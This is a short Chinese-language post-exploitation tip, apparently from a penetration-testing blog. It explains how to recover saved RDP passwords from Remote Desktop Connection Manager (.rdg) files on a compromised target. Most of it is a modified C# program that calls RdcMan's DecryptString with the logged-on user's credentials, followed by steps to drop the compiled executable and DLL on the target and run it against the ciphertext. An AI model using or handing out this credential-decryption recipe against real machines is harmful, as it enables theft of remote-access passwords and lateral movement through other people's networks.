如果你看见目标上面安装Remote destkop connections manager,找到rdg文件发现里面有密文,那么祝贺你。可以解密

注意:本次解密用的是用户登陆凭证作为加密密钥来解密的。

项目地址:https://github.com/winterific/RDCManTest

大神告诉我如下:
修改MainTest.cs的代码为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
using System;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using RdcMan;

namespace RDCManTest
{
[TestClass]
public class MainTest
{
[TestMethod]
private static void Main(string[] args)
{
EncryptionSettings settings = new EncryptionSettings();
string text = "";
if (args.Length == 1)
{
text = args[0];
string value = Encryption.DecryptString(text, settings);
Console.WriteLine(value);
}
else
{
Console.WriteLine("Please Input encryptedPassword String. ");
}
}
}
}

并把输出类改为:控制台应用程序。


然后把RDCManTest.exe和RDCMan.dll放到目标去,然后cmd下执行:RDCManTest.exe hash